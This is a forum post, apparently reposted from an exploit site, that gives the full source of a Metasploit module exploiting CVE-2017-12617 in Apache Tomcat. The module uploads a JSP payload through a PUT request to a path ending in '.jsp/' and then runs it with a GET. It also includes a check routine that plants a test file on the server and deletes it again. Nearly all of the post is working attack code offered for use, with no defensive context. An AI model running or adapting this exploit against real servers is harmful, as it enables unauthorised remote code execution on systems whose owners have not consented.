Jump to content
Fi8sVrs

Apache Tomcat JSP Upload Bypass Remote Code Execution Exploit

Recommended Posts

  • Active Members

This Metasploit module uploads a jsp payload and executes it.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
 
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
      'Description'    => %q{
        This module uploads a jsp payload and executes it.
      },
      'Author'      => 'peewpw',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-12617' ],
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],
          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]
        ],
      'Privileged'     => false,
      'Platform'    => %w{ linux win }, # others?
      'Targets'     =>
        [
          [ 'Automatic',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [ 'Java Windows',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [ 'Java Linux',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate' => 'Oct 03 2017',
      'DefaultTarget'  => 0))
 
    register_options([
        OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
        Opt::RPORT(8080)
      ])
  end
 
  def check
    testurl = Rex::Text::rand_text_alpha(10)
    testcontent = Rex::Text::rand_text_alpha(10)
 
    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method'    => 'PUT',
      'data'      => "<% out.println(\"#{testcontent}\");%>"
    })
 
    res1 = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp"),
      'method'    => 'GET'
    })
 
    if res1 && res1.body.include?(testcontent)
      send_request_cgi(
        opts = {
          'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
          'method'    => 'DELETE'
        },
        timeout = 1
      )
      return Exploit::CheckCode::Vulnerable
    end
 
    Exploit::CheckCode::Safe
  end
 
  def exploit
    print_status("Uploading payload...")
    testurl = Rex::Text::rand_text_alpha(10)
 
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method'    => 'PUT',
      'data'      => payload.encoded
    })
    if res && res.code == 201
      res1 = send_request_cgi({
        'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp"),
        'method'    => 'GET'
      })
      if res1 && res1.code == 200
        print_status("Payload executed!")
      else
        fail_with(Failure::PayloadFailed, "Failed to execute the payload")
      end
    else
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
    end
  end
 
end
 
#  0day.today [2017-10-13]  #

Source: 0day.today

  • Like 1
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...